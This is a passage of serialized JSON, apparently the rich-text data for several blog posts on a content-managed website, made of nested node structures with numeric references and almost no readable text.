ecosystem",{"items":25192},[25193,25734,26562],{"__typename":2059,"sys":25194,"content":25195,"title":21279,"synopsis":21280,"hashTags":59,"publishedDate":21281,"slug":21282,"tagsCollection":25724,"authorsCollection":25730},{"id":20680},{"json":25196},{"data":25197,"content":25198,"nodeType":856},{},[25199,25205,25211,25252,25257,25263,25269,25274,25279,25284,25287,25294,25300,25305,25311,25316,25321,25327,25332,25347,25350,25357,25363,25369,25375,25381,25386,25401,25404,25411,25417,25463,25469,25475,25478,25485,25491,25497,25503,25529,25532,25539,25555,25561,25600,25606,25645,25651,25717],{"data":25200,"content":25201,"nodeType":860},{},[25202],{"data":25203,"marks":25204,"value":20691,"nodeType":864},{},[],{"data":25206,"content":25207,"nodeType":860},{},[25208],{"data":25209,"marks":25210,"value":20698,"nodeType":864},{},[],{"data":25212,"content":25213,"nodeType":941},{},[25214,25233],{"data":25215,"content":25216,"nodeType":945},{},[25217],{"data":25218,"content":25219,"nodeType":860},{},[25220,25223,25230],{"data":25221,"marks":25222,"value":20711,"nodeType":864},{},[],{"data":25224,"content":25225,"nodeType":883},{"uri":20714},[25226],{"data":25227,"marks":25228,"value":20720,"nodeType":864},{},[25229],{"type":1455},{"data":25231,"marks":25232,"value":20724,"nodeType":864},{},[],{"data":25234,"content":25235,"nodeType":945},{},[25236],{"data":25237,"content":25238,"nodeType":860},{},[25239,25242,25249],{"data":25240,"marks":25241,"value":20734,"nodeType":864},{},[],{"data":25243,"content":25244,"nodeType":883},{"uri":20737},[25245],{"data":25246,"marks":25247,"value":20743,"nodeType":864},{},[25248],{"type":1455},{"data":25250,"marks":25251,"value":20747,"nodeType":864},{},[],{"data":25253,"content":25256,"nodeType":996},{"target":25254},{"sys":25255},{"id":20752,"type":1001,"linkType":1002},[],{"data":25258,"content":25259,"nodeType":860},{},[25260],{"data":25261,"marks":25262,"value":20760,"nodeType":864},{},[],{"data":25264,"content":25265,"nodeType":860},{},[25266],{"data":25267,"marks":25268,"value":20767,"nodeType":864},{},[],{"data":25270,"content":25273,"nodeType":996},{"target":25271},{"sys":25272},{"id":20772,"type":1001,"linkType":1002},[],{"data":25275,"content":25278,"nodeType":996},{"target":25276},{"sys":25277},{"id":20778,"type":1001,"linkType":1002},[],{"data":25280,"content":25283,"nodeType":996},{"target":25281},{"sys":25282},{"id":20784,"type":1001,"linkType":1002},[],{"data":25285,"content":25286,"nodeType":1005},{},[],{"data":25288,"content":25289,"nodeType":1009},{},[25290],{"data":25291,"marks":25292,"value":20796,"nodeType":864},{},[25293],{"type":899},{"data":25295,"content":25296,"nodeType":860},{},[25297],{"data":25298,"marks":25299,"value":20803,"nodeType":864},{},[],{"data":25301,"content":25304,"nodeType":996},{"target":25302},{"sys":25303},{"id":20808,"type":1001,"linkType":1002},[],{"data":25306,"content":25307,"nodeType":860},{},[25308],{"data":25309,"marks":25310,"value":20816,"nodeType":864},{},[],{"data":25312,"content":25315,"nodeType":996},{"target":25313},{"sys":25314},{"id":20821,"type":1001,"linkType":1002},[],{"data":25317,"content":25320,"nodeType":996},{"target":25318},{"sys":25319},{"id":20827,"type":1001,"linkType":1002},[],{"data":25322,"content":25323,"nodeType":860},{},[25324],{"data":25325,"marks":25326,"value":20835,"nodeType":864},{},[],{"data":25328,"content":25331,"nodeType":996},{"target":25329},{"sys":25330},{"id":20840,"type":1001,"linkType":1002},[],{"data":25333,"content":25334,"nodeType":860},{},[25335,25338,25344],{"data":25336,"marks":25337,"value":20848,"nodeType":864},{},[],{"data":25339,"content":25340,"nodeType":883},{"uri":20714},[25341],{"data":25342,"marks":25343,"value":20855,"nodeType":864},{},[],{"data":25345,"marks":25346,"value":10094,"nodeType":864},{},[],{"data":25348,"content":25349,"nodeType":1005},{},[],{"data":25351,"content":25352,"nodeType":1009},{},[25353],{"data":25354,"marks":25355,"value":20869,"nodeType":864},{},[25356],{"type":899},{"data":25358,"content":25359,"nodeType":860},{},[25360],{"data":25361,"marks":25362,"value":20876,"nodeType":864},{},[],{"data":25364,"content":25365,"nodeType":860},{},[25366],{"data":25367,"marks":25368,"value":20883,"nodeType":864},{},[],{"data":25370,"content":25371,"nodeType":860},{},[25372],{"data":25373,"marks":25374,"value":20890,"nodeType":864},{},[],{"data":25376,"content":25377,"nodeType":860},{},[25378],{"data":25379,"marks":25380,"value":20897,"nodeType":864},{},[],{"data":25382,"content":25385,"nodeType":996},{"target":25383},{"sys":25384},{"id":20902,"type":1001,"linkType":1002},[],{"data":25387,"content":25388,"nodeType":860},{},[25389,25392,25398],{"data":25390,"marks":25391,"value":20910,"nodeType":864},{},[],{"data":25393,"content":25394,"nodeType":883},{"uri":20913},[25395],{"data":25396,"marks":25397,"value":20918,"nodeType":864},{},[],{"data":25399,"marks":25400,"value":10094,"nodeType":864},{},[],{"data":25402,"content":25403,"nodeType":1005},{},[],{"data":25405,"content":25406,"nodeType":1009},{},[25407],{"data":25408,"marks":25409,"value":20932,"nodeType":864},{},[25410],{"type":899},{"data":25412,"content":25413,"nodeType":860},{},[25414],{"data":25415,"marks":25416,"value":20939,"nodeType":864},{},[],{"data":25418,"content":25419,"nodeType":860},{},[25420,25423,25430,25433,25440,25443,25450,25453,25460],{"data":25421,"marks":25422,"value":20946,"nodeType":864},{},[],{"data":25424,"content":25425,"nodeType":883},{"uri":13019},[25426],{"data":25427,"marks":25428,"value":315,"nodeType":864},{},[25429],{"type":1455},{"data":25431,"marks":25432,"value":20957,"nodeType":864},{},[],{"data":25434,"content":25435,"nodeType":883},{"uri":6912},[25436],{"data":25437,"marks":25438,"value":20965,"nodeType":864},{},[25439],{"type":1455},{"data":25441,"marks":25442,"value":3731,"nodeType":864},{},[],{"data":25444,"content":25445,"nodeType":883},{"uri":20971},[25446],{"data":25447,"marks":25448,"value":20977,"nodeType":864},{},[25449],{"type":1455},{"data":25451,"marks":25452,"value":2232,"nodeType":864},{},[],{"data":25454,"content":25455,"nodeType":883},{"uri":20983},[25456],{"data":25457,"marks":25458,"value":20989,"nodeType":864},{},[25459],{"type":1455},{"data":25461,"marks":25462,"value":20993,"nodeType":864},{},[],{"data":25464,"content":25465,"nodeType":860},{},[25466],{"data":25467,"marks":25468,"value":21000,"nodeType":864},{},[],{"data":25470,"content":25471,"nodeType":860},{},[25472],{"data":25473,"marks":25474,"value":21007,"nodeType":864},{},[],{"data":25476,"content":25477,"nodeType":1005},{},[],{"data":25479,"content":25480,"nodeType":1009},{},[25481],{"data":25482,"marks":25483,"value":21018,"nodeType":864},{},[25484],{"type":899},{"data":25486,"content":25487,"nodeType":860},{},[25488],{"data":25489,"marks":25490,"value":21025,"nodeType":864},{},[],{"data":25492,"content":25493,"nodeType":860},{},[25494],{"data":25495,"marks":25496,"value":21032,"nodeType":864},{},[],{"data":25498,"content":25499,"nodeType":860},{},[25500],{"data":25501,"marks":25502,"value":21039,"nodeType":864},{},[],{"data":25504,"content":25505,"nodeType":860},{},[25506,25509,25516,25519,25526],{"data":25507,"marks":25508,"value":16314,"nodeType":864},{},[],{"data":25510,"content":25511,"nodeType":883},{"uri":10269},[25512],{"data":25513,"marks":25514,"value":10275,"nodeType":864},{},[25515],{"type":1455},{"data":25517,"marks":25518,"value":19754,"nodeType":864},{},[],{"data":25520,"content":25521,"nodeType":883},{"uri":1700},[25522],{"data":25523,"marks":25524,"value":10299,"nodeType":864},{},[25525],{"type":1455},{"data":25527,"marks":25528,"value":2924,"nodeType":864},{},[],{"data":25530,"content":25531,"nodeType":1005},{},[],{"data":25533,"content":25534,"nodeType":1009},{},[25535],{"data":25536,"marks":25537,"value":5571,"nodeType":864},{},[25538],{"type":899},{"data":25540,"content":25541,"nodeType":860},{},[25542,25545,25552],{"data":25543,"marks":25544,"value":12615,"nodeType":864},{},[],{"data":25546,"content":25547,"nodeType":883},{"uri":7248},[25548],{"data":25549,"marks":25550,"value":7253,"nodeType":864},{},[25551],{"type":1455},{"data":25553,"marks":25554,"value":18496,"nodeType":864},{},[],{"data":25556,"content":25557,"nodeType":860},{},[25558],{"data":25559,"marks":25560,"value":21098,"nodeType":864},{},[],{"data":25562,"content":25563,"nodeType":941},{},[25564,25573,25582,25591],{"data":25565,"content":25566,"nodeType":945},{},[25567],{"data":25568,"content":25569,"nodeType":860},{},[25570],{"data":25571,"marks":25572,"value":21111,"nodeType":864},{},[],{"data":25574,"content":25575,"nodeType":945},{},[25576],{"data":25577,"content":25578,"nodeType":860},{},[25579],{"data":25580,"marks":25581,"value":21121,"nodeType":864},{},[],{"data":25583,"content":25584,"nodeType":945},{},[25585],{"data":25586,"content":25587,"nodeType":860},{},[25588],{"data":25589,"marks":25590,"value":21131,"nodeType":864},{},[],{"data":25592,"content":25593,"nodeType":945},{},[25594],{"data":25595,"content":25596,"nodeType":860},{},[25597],{"data":25598,"marks":25599,"value":21141,"nodeType":864},{},[],{"data":25601,"content":25602,"nodeType":860},{},[25603],{"data":25604,"marks":25605,"value":21148,"nodeType":864},{},[],{"data":25607,"content":25608,"nodeType":941},{},[25609,25618,25627,25636],{"data":25610,"content":25611,"nodeType":945},{},[25612],{"data":25613,"content":25614,"nodeType":860},{},[25615],{"data":25616,"marks":25617,"value":21161,"nodeType":864},{},[],{"data":25619,"content":25620,"nodeType":945},{},[25621],{"data":25622,"content":25623,"nodeType":860},{},[25624],{"data":25625,"marks":25626,"value":21171,"nodeType":864},{},[],{"data":25628,"content":25629,"nodeType":945},{},[25630],{"data":25631,"content":25632,"nodeType":860},{},[25633],{"data":25634,"marks":25635,"value":21181,"nodeType":864},{},[],{"data":25637,"content":25638,"nodeType":945},{},[25639],{"data":25640,"content":25641,"nodeType":860},{},[25642],{"data":25643,"marks":25644,"value":21191,"nodeType":864},{},[],{"data":25646,"content":25647,"nodeType":860},{},[25648],{"data":25649,"marks":25650,"value":21198,"nodeType":864},{},[],{"data":25652,"content":25653,"nodeType":941},{},[25654,25663,25672,25681,25690,25699,25708],{"data":25655,"content":25656,"nodeType":945},{},[25657],{"data":25658,"content":25659,"nodeType":860},{},[25660],{"data":25661,"marks":25662,"value":21211,"nodeType":864},{},[],{"data":25664,"content":25665,"nodeType":945},{},[25666],{"data":25667,"content":25668,"nodeType":860},{},[25669],{"data":25670,"marks":25671,"value":21221,"nodeType":864},{},[],{"data":25673,"content":25674,"nodeType":945},{},[25675],{"data":25676,"content":25677,"nodeType":860},{},[25678],{"data":25679,"marks":25680,"value":21231,"nodeType":864},{},[],{"data":25682,"content":25683,"nodeType":945},{},[25684],{"data":25685,"content":25686,"nodeType":860},{},[25687],{"data":25688,"marks":25689,"value":21241,"nodeType":864},{},[],{"data":25691,"content":25692,"nodeType":945},{},[25693],{"data":25694,"content":25695,"nodeType":860},{},[25696],{"data":25697,"marks":25698,"value":21251,"nodeType":864},{},[],{"data":25700,"content":25701,"nodeType":945},{},[25702],{"data":25703,"content":25704,"nodeType":860},{},[25705],{"data":25706,"marks":25707,"value":21261,"nodeType":864},{},[],{"data":25709,"content":25710,"nodeType":945},{},[25711],{"data":25712,"content":25713,"nodeType":860},{},[25714],{"data":25715,"marks":25716,"value":21271,"nodeType":864},{},[],{"data":25718,"content":25719,"nodeType":860},{},[25720],{"data":25721,"marks":25722,"value":7196,"nodeType":864},{},[25723],{"type":899},{"items":25725},[25726,25728],{"sys":25727,"name":342},{"id":6596},{"sys":25729,"name":6593},{"id":6592},{"items":25731},[25732],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":25733},{"url":2740},{"__typename":2059,"sys":25735,"content":25736,"title":19765,"synopsis":19766,"hashTags":59,"publishedDate":19767,"slug":19768,"tagsCollection":26552,"authorsCollection":26558},{"id":18820},{"json":25737},{"data":25738,"content":25739,"nodeType":856},{},[25740,25746,25752,25758,25761,25768,25774,25780,25785,25791,25796,25812,25818,25828,25831,25838,25844,25857,25863,25873,25878,25881,25888,25895,25900,25908,25924,25932,25938,25946,25961,25969,25975,25983,26009,26017,26023,26031,26047,26052,26060,26066,26074,26107,26110,26117,26125,26141,26149,26155,26163,26189,26194,26202,26208,26213,26216,26223,26231,26237,26288,26293,26296,26303,26311,26317,26322,26325,26332,26338,26344,26404,26410,26465,26471,26474,26481,26487,26493,26498,26501,26508,26514,26520,26526],{"data":25741,"content":25742,"nodeType":860},{},[25743],{"data":25744,"marks":25745,"value":18831,"nodeType":864},{},[],{"data":25747,"content":25748,"nodeType":860},{},[25749],{"data":25750,"marks":25751,"value":18838,"nodeType":864},{},[],{"data":25753,"content":25754,"nodeType":860},{},[25755],{"data":25756,"marks":25757,"value":18845,"nodeType":864},{},[],{"data":25759,"content":25760,"nodeType":1005},{},[],{"data":25762,"content":25763,"nodeType":1009},{},[25764],{"data":25765,"marks":25766,"value":18856,"nodeType":864},{},[25767],{"type":899},{"data":25769,"content":25770,"nodeType":860},{},[25771],{"data":25772,"marks":25773,"value":18863,"nodeType":864},{},[],{"data":25775,"content":25776,"nodeType":860},{},[25777],{"data":25778,"marks":25779,"value":18870,"nodeType":864},{},[],{"data":25781,"content":25784,"nodeType":996},{"target":25782},{"sys":25783},{"id":18875,"type":1001,"linkType":1002},[],{"data":25786,"content":25787,"nodeType":860},{},[25788],{"data":25789,"marks":25790,"value":18883,"nodeType":864},{},[],{"data":25792,"content":25795,"nodeType":996},{"target":25793},{"sys":25794},{"id":18888,"type":1001,"linkType":1002},[],{"data":25797,"content":25798,"nodeType":860},{},[25799,25802,25809],{"data":25800,"marks":25801,"value":18896,"nodeType":864},{},[],{"data":25803,"content":25804,"nodeType":883},{"uri":17177},[25805],{"data":25806,"marks":25807,"value":18904,"nodeType":864},{},[25808],{"type":1455},{"data":25810,"marks":25811,"value":18908,"nodeType":864},{},[],{"data":25813,"content":25814,"nodeType":860},{},[25815],{"data":25816,"marks":25817,"value":18915,"nodeType":864},{},[],{"data":25819,"content":25820,"nodeType":860},{},[25821,25824],{"data":25822,"marks":25823,"value":18922,"nodeType":864},{},[],{"data":25825,"marks":25826,"value":18927,"nodeType":864},{},[25827],{"type":899},{"data":25829,"content":25830,"nodeType":1005},{},[],{"data":25832,"content":25833,"nodeType":1009},{},[25834],{"data":25835,"marks":25836,"value":18938,"nodeType":864},{},[25837],{"type":899},{"data":25839,"content":25840,"nodeType":860},{},[25841],{"data":25842,"marks":25843,"value":18945,"nodeType":864},{},[],{"data":25845,"content":25846,"nodeType":860},{},[25847,25850,25854],{"data":25848,"marks":25849,"value":18952,"nodeType":864},{},[],{"data":25851,"marks":25852,"value":18957,"nodeType":864},{},[25853],{"type":899},{"data":25855,"marks":25856,"value":18961,"nodeType":864},{},[],{"data":25858,"content":25859,"nodeType":860},{},[25860],{"data":25861,"marks":25862,"value":18968,"nodeType":864},{},[],{"data":25864,"content":25865,"nodeType":860},{},[25866,25869],{"data":25867,"marks":25868,"value":18975,"nodeType":864},{},[],{"data":25870,"marks":25871,"value":18980,"nodeType":864},{},[25872],{"type":899},{"data":25874,"content":25877,"nodeType":996},{"target":25875},{"sys":25876},{"id":18985,"type":1001,"linkType":1002},[],{"data":25879,"content":25880,"nodeType":1005},{},[],{"data":25882,"content":25883,"nodeType":1009},{},[25884],{"data":25885,"marks":25886,"value":18997,"nodeType":864},{},[25887],{"type":899},{"data":25889,"content":25890,"nodeType":1312},{},[25891],{"data":25892,"marks":25893,"value":19005,"nodeType":864},{},[25894],{"type":899},{"data":25896,"content":25899,"nodeType":996},{"target":25897},{"sys":25898},{"id":19010,"type":1001,"linkType":1002},[],{"data":25901,"content":25902,"nodeType":860},{},[25903],{"data":25904,"marks":25905,"value":19020,"nodeType":864},{},[25906,25907],{"type":899},{"type":1455},{"data":25909,"content":25910,"nodeType":860},{},[25911,25914,25921],{"data":25912,"marks":25913,"value":19027,"nodeType":864},{},[],{"data":25915,"content":25916,"nodeType":883},{"uri":19030},[25917],{"data":25918,"marks":25919,"value":19036,"nodeType":864},{},[25920],{"type":1455},{"data":25922,"marks":25923,"value":19040,"nodeType":864},{},[],{"data":25925,"content":25926,"nodeType":860},{},[25927],{"data":25928,"marks":25929,"value":19049,"nodeType":864},{},[25930,25931],{"type":899},{"type":1455},{"data":25933,"content":25934,"nodeType":860},{},[25935],{"data":25936,"marks":25937,"value":19056,"nodeType":864},{},[],{"data":25939,"content":25940,"nodeType":860},{},[25941],{"data":25942,"marks":25943,"value":19065,"nodeType":864},{},[25944,25945],{"type":899},{"type":1455},{"data":25947,"content":25948,"nodeType":860},{},[25949,25952,25958],{"data":25950,"marks":25951,"value":19072,"nodeType":864},{},[],{"data":25953,"content":25954,"nodeType":883},{"uri":19075},[25955],{"data":25956,"marks":25957,"value":19080,"nodeType":864},{},[],{"data":25959,"marks":25960,"value":19084,"nodeType":864},{},[],{"data":25962,"content":25963,"nodeType":860},{},[25964],{"data":25965,"marks":25966,"value":19093,"nodeType":864},{},[25967,25968],{"type":899},{"type":1455},{"data":25970,"content":25971,"nodeType":860},{},[25972],{"data":25973,"marks":25974,"value":19100,"nodeType":864},{},[],{"data":25976,"content":25977,"nodeType":860},{},[25978],{"data":25979,"marks":25980,"value":19109,"nodeType":864},{},[25981,25982],{"type":899},{"type":1455},{"data":25984,"content":25985,"nodeType":860},{},[25986,25989,25996,25999,26006],{"data":25987,"marks":25988,"value":19116,"nodeType":864},{},[],{"data":25990,"content":25991,"nodeType":883},{"uri":3751},[25992],{"data":25993,"marks":25994,"value":19124,"nodeType":864},{},[25995],{"type":1455},{"data":25997,"marks":25998,"value":19128,"nodeType":864},{},[],{"data":26000,"content":26001,"nodeType":883},{"uri":19131},[26002],{"data":26003,"marks":26004,"value":19137,"nodeType":864},{},[26005],{"type":1455},{"data":26007,"marks":26008,"value":19141,"nodeType":864},{},[],{"data":26010,"content":26011,"nodeType":860},{},[26012],{"data":26013,"marks":26014,"value":19150,"nodeType":864},{},[26015,26016],{"type":899},{"type":1455},{"data":26018,"content":26019,"nodeType":860},{},[26020],{"data":26021,"marks":26022,"value":19157,"nodeType":864},{},[],{"data":26024,"content":26025,"nodeType":860},{},[26026],{"data":26027,"marks":26028,"value":19166,"nodeType":864},{},[26029,26030],{"type":899},{"type":1455},{"data":26032,"content":26033,"nodeType":860},{},[26034,26037,26044],{"data":26035,"marks":26036,"value":19173,"nodeType":864},{},[],{"data":26038,"content":26039,"nodeType":883},{"uri":19131},[26040],{"data":26041,"marks":26042,"value":19137,"nodeType":864},{},[26043],{"type":1455},{"data":26045,"marks":26046,"value":19184,"nodeType":864},{},[],{"data":26048,"content":26051,"nodeType":996},{"target":26049},{"sys":26050},{"id":19189,"type":1001,"linkType":1002},[],{"data":26053,"content":26054,"nodeType":860},{},[26055],{"data":26056,"marks":26057,"value":19199,"nodeType":864},{},[26058,26059],{"type":899},{"type":1455},{"data":26061,"content":26062,"nodeType":860},{},[26063],{"data":26064,"marks":26065,"value":19206,"nodeType":864},{},[],{"data":26067,"content":26068,"nodeType":860},{},[26069],{"data":26070,"marks":26071,"value":19215,"nodeType":864},{},[26072,26073],{"type":899},{"type":1455},{"data":26075,"content":26076,"nodeType":860},{},[26077,26080,26086,26089,26095,26098,26104],{"data":26078,"marks":26079,"value":19222,"nodeType":864},{},[],{"data":26081,"content":26082,"nodeType":883},{"uri":19225},[26083],{"data":26084,"marks":26085,"value":19230,"nodeType":864},{},[],{"data":26087,"marks":26088,"value":902,"nodeType":864},{},[],{"data":26090,"content":26091,"nodeType":883},{"uri":19236},[26092],{"data":26093,"marks":26094,"value":19241,"nodeType":864},{},[],{"data":26096,"marks":26097,"value":19245,"nodeType":864},{},[],{"data":26099,"content":26100,"nodeType":883},{"uri":6259},[26101],{"data":26102,"marks":26103,"value":19252,"nodeType":864},{},[],{"data":26105,"marks":26106,"value":19256,"nodeType":864},{},[],{"data":26108,"content":26109,"nodeType":1005},{},[],{"data":26111,"content":26112,"nodeType":1312},{},[26113],{"data":26114,"marks":26115,"value":19267,"nodeType":864},{},[26116],{"type":899},{"data":26118,"content":26119,"nodeType":860},{},[26120],{"data":26121,"marks":26122,"value":19276,"nodeType":864},{},[26123,26124],{"type":899},{"type":1455},{"data":26126,"content":26127,"nodeType":860},{},[26128,26131,26138],{"data":26129,"marks":26130,"value":19283,"nodeType":864},{},[],{"data":26132,"content":26133,"nodeType":883},{"uri":19286},[26134],{"data":26135,"marks":26136,"value":19292,"nodeType":864},{},[26137],{"type":1455},{"data":26139,"marks":26140,"value":19296,"nodeType":864},{},[],{"data":26142,"content":26143,"nodeType":860},{},[26144],{"data":26145,"marks":26146,"value":19305,"nodeType":864},{},[26147,26148],{"type":899},{"type":1455},{"data":26150,"content":26151,"nodeType":860},{},[26152],{"data":26153,"marks":26154,"value":19312,"nodeType":864},{},[],{"data":26156,"content":26157,"nodeType":860},{},[26158],{"data":26159,"marks":26160,"value":19321,"nodeType":864},{},[26161,26162],{"type":899},{"type":1455},{"data":26164,"content":26165,"nodeType":860},{},[26166,26169,26176,26179,26186],{"data":26167,"marks":26168,"value":19328,"nodeType":864},{},[],{"data":26170,"content":26171,"nodeType":883},{"uri":19331},[26172],{"data":26173,"marks":26174,"value":19337,"nodeType":864},{},[26175],{"type":1455},{"data":26177,"marks":26178,"value":19341,"nodeType":864},{},[],{"data":26180,"content":26181,"nodeType":883},{"uri":19344},[26182],{"data":26183,"marks":26184,"value":19350,"nodeType":864},{},[26185],{"type":1455},{"data":26187,"marks":26188,"value":19354,"nodeType":864},{},[],{"data":26190,"content":26193,"nodeType":996},{"target":26191},{"sys":26192},{"id":19359,"type":1001,"linkType":1002},[],{"data":26195,"content":26196,"nodeType":860},{},[26197],{"data":26198,"marks":26199,"value":19369,"nodeType":864},{},[26200,26201],{"type":899},{"type":1455},{"data":26203,"content":26204,"nodeType":860},{},[26205],{"data":26206,"marks":26207,"value":19376,"nodeType":864},{},[],{"data":26209,"content":26212,"nodeType":996},{"target":26210},{"sys":26211},{"id":19381,"type":1001,"linkType":1002},[],{"data":26214,"content":26215,"nodeType":1005},{},[],{"data":26217,"content":26218,"nodeType":1312},{},[26219],{"data":26220,"marks":26221,"value":694,"nodeType":864},{},[26222],{"type":899},{"data":26224,"content":26225,"nodeType":860},{},[26226],{"data":26227,"marks":26228,"value":19401,"nodeType":864},{},[26229,26230],{"type":899},{"type":1455},{"data":26232,"content":26233,"nodeType":860},{},[26234],{"data":26235,"marks":26236,"value":19408,"nodeType":864},{},[],{"data":26238,"content":26239,"nodeType":941},{},[26240,26253,26266],{"data":26241,"content":26242,"nodeType":945},{},[26243],{"data":26244,"content":26245,"nodeType":860},{},[26246,26250],{"data":26247,"marks":26248,"value":19422,"nodeType":864},{},[26249],{"type":899},{"data":26251,"marks":26252,"value":19426,"nodeType":864},{},[],{"data":26254,"content":26255,"nodeType":945},{},[26256],{"data":26257,"content":26258,"nodeType":860},{},[26259,26263],{"data":26260,"marks":26261,"value":19437,"nodeType":864},{},[26262],{"type":899},{"data":26264,"marks":26265,"value":19441,"nodeType":864},{},[],{"data":26267,"content":26268,"nodeType":945},{},[26269],{"data":26270,"content":26271,"nodeType":860},{},[26272,26276,26279,26285],{"data":26273,"marks":26274,"value":19452,"nodeType":864},{},[26275],{"type":899},{"data":26277,"marks":26278,"value":19456,"nodeType":864},{},[],{"data":26280,"content":26281,"nodeType":883},{"uri":19459},[26282],{"data":26283,"marks":26284,"value":19464,"nodeType":864},{},[],{"data":26286,"marks":26287,"value":19468,"nodeType":864},{},[],{"data":26289,"content":26292,"nodeType":996},{"target":26290},{"sys":26291},{"id":19473,"type":1001,"linkType":1002},[],{"data":26294,"content":26295,"nodeType":1005},{},[],{"data":26297,"content":26298,"nodeType":1312},{},[26299],{"data":26300,"marks":26301,"value":699,"nodeType":864},{},[26302],{"type":899},{"data":26304,"content":26305,"nodeType":860},{},[26306],{"data":26307,"marks":26308,"value":19493,"nodeType":864},{},[26309,26310],{"type":899},{"type":1455},{"data":26312,"content":26313,"nodeType":860},{},[26314],{"data":26315,"marks":26316,"value":19500,"nodeType":864},{},[],{"data":26318,"content":26321,"nodeType":996},{"target":26319},{"sys":26320},{"id":19505,"type":1001,"linkType":1002},[],{"data":26323,"content":26324,"nodeType":1005},{},[],{"data":26326,"content":26327,"nodeType":1009},{},[26328],{"data":26329,"marks":26330,"value":5520,"nodeType":864},{},[26331],{"type":899},{"data":26333,"content":26334,"nodeType":860},{},[26335],{"data":26336,"marks":26337,"value":19523,"nodeType":864},{},[],{"data":26339,"content":26340,"nodeType":860},{},[26341],{"data":26342,"marks":26343,"value":19530,"nodeType":864},{},[],{"data":26345,"content":26346,"nodeType":941},{},[26347,26366,26385],{"data":26348,"content":26349,"nodeType":945},{},[26350],{"data":26351,"content":26352,"nodeType":860},{},[26353,26356,26363],{"data":26354,"marks":26355,"value":19543,"nodeType":864},{},[],{"data":26357,"content":26358,"nodeType":883},{"uri":19546},[26359],{"data":26360,"marks":26361,"value":13585,"nodeType":864},{},[26362],{"type":1455},{"data":26364,"marks":26365,"value":10724,"nodeType":864},{},[],{"data":26367,"content":26368,"nodeType":945},{},[26369],{"data":26370,"content":26371,"nodeType":860},{},[26372,26375,26382],{"data":26373,"marks":26374,"value":19564,"nodeType":864},{},[],{"data":26376,"content":26377,"nodeType":883},{"uri":19567},[26378],{"data":26379,"marks":26380,"value":19573,"nodeType":864},{},[26381],{"type":1455},{"data":26383,"marks":26384,"value":10724,"nodeType":864},{},[],{"data":26386,"content":26387,"nodeType":945},{},[26388],{"data":26389,"content":26390,"nodeType":860},{},[26391,26394,26401],{"data":26392,"marks":26393,"value":19586,"nodeType":864},{},[],{"data":26395,"content":26396,"nodeType":883},{"uri":19589},[26397],{"data":26398,"marks":26399,"value":19595,"nodeType":864},{},[26400],{"type":1455},{"data":26402,"marks":26403,"value":10724,"nodeType":864},{},[],{"data":26405,"content":26406,"nodeType":860},{},[26407],{"data":26408,"marks":26409,"value":19605,"nodeType":864},{},[],{"data":26411,"content":26412,"nodeType":941},{},[26413,26426,26439,26452],{"data":26414,"content":26415,"nodeType":945},{},[26416],{"data":26417,"content":26418,"nodeType":860},{},[26419,26423],{"data":26420,"marks":26421,"value":19619,"nodeType":864},{},[26422],{"type":899},{"data":26424,"marks":26425,"value":19623,"nodeType":864},{},[],{"data":26427,"content":26428,"nodeType":945},{},[26429],{"data":26430,"content":26431,"nodeType":860},{},[26432,26436],{"data":26433,"marks":26434,"value":19634,"nodeType":864},{},[26435],{"type":899},{"data":26437,"marks":26438,"value":19638,"nodeType":864},{},[],{"data":26440,"content":26441,"nodeType":945},{},[26442],{"data":26443,"content":26444,"nodeType":860},{},[26445,26449],{"data":26446,"marks":26447,"value":19649,"nodeType":864},{},[26448],{"type":899},{"data":26450,"marks":26451,"value":19653,"nodeType":864},{},[],{"data":26453,"content":26454,"nodeType":945},{},[26455],{"data":26456,"content":26457,"nodeType":860},{},[26458,26462],{"data":26459,"marks":26460,"value":19664,"nodeType":864},{},[26461],{"type":899},{"data":26463,"marks":26464,"value":19668,"nodeType":864},{},[],{"data":26466,"content":26467,"nodeType":860},{},[26468],{"data":26469,"marks":26470,"value":19675,"nodeType":864},{},[],{"data":26472,"content":26473,"nodeType":1005},{},[],{"data":26475,"content":26476,"nodeType":1009},{},[26477],{"data":26478,"marks":26479,"value":19686,"nodeType":864},{},[26480],{"type":899},{"data":26482,"content":26483,"nodeType":860},{},[26484],{"data":26485,"marks":26486,"value":19693,"nodeType":864},{},[],{"data":26488,"content":26489,"nodeType":860},{},[26490],{"data":26491,"marks":26492,"value":19700,"nodeType":864},{},[],{"data":26494,"content":26497,"nodeType":996},{"target":26495},{"sys":26496},{"id":19705,"type":1001,"linkType":1002},[],{"data":26499,"content":26500,"nodeType":1005},{},[],{"data":26502,"content":26503,"nodeType":1009},{},[26504],{"data":26505,"marks":26506,"value":17636,"nodeType":864},{},[26507],{"type":899},{"data":26509,"content":26510,"nodeType":860},{},[26511],{"data":26512,"marks":26513,"value":19723,"nodeType":864},{},[],{"data":26515,"content":26516,"nodeType":860},{},[26517],{"data":26518,"marks":26519,"value":19730,"nodeType":864},{},[],{"data":26521,"content":26522,"nodeType":860},{},[26523],{"data":26524,"marks":26525,"value":19737,"nodeType":864},{},[],{"data":26527,"content":26528,"nodeType":860},{},[26529,26532,26539,26542,26549],{"data":26530,"marks":26531,"value":16314,"nodeType":864},{},[],{"data":26533,"content":26534,"nodeType":883},{"uri":10269},[26535],{"data":26536,"marks":26537,"value":10275,"nodeType":864},{},[26538],{"type":1455},{"data":26540,"marks":26541,"value":19754,"nodeType":864},{},[],{"data":26543,"content":26544,"nodeType":883},{"uri":1700},[26545],{"data":26546,"marks":26547,"value":10299,"nodeType":864},{},[26548],{"type":1455},{"data":26550,"marks":26551,"value":2924,"nodeType":864},{},[],{"items":26553},[26554,26556],{"sys":26555,"name":6593},{"id":6592},{"sys":26557,"name":342},{"id":6596},{"items":26559},[26560],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":26561},{"url":2740},{"__typename":2059,"sys":26563,"content":26565,"title":27232,"synopsis":27233,"hashTags":59,"publishedDate":27234,"slug":27235,"tagsCollection":27236,"authorsCollection":27242},{"id":26564},"5CqV6e5wfHsfEVczkWSerZ",{"json":26566},{"data":26567,"content":26568,"nodeType":856},{},[26569,26575,26582,26589,26592,26600,26607,26614,26621,26715,26721,26727,26733,26740,26747,26766,26769,26777,26784,26791,26798,26841,26848,26894,26900,26907,26914,26917,26925,26932,26939,26946,27016,27022,27028,27060,27066,27085,27091,27098,27105,27111,27114,27122,27129,27162,27169,27172,27180,27187,27194,27220,27226],{"data":26570,"content":26574,"nodeType":996},{"target":26571},{"sys":26572},{"id":26573,"type":1001,"linkType":1002},"1axcGwWxeKxDMk8jOWhYT6",[],{"data":26576,"content":26577,"nodeType":860},{},[26578],{"data":26579,"marks":26580,"value":26581,"nodeType":864},{},[],"2025 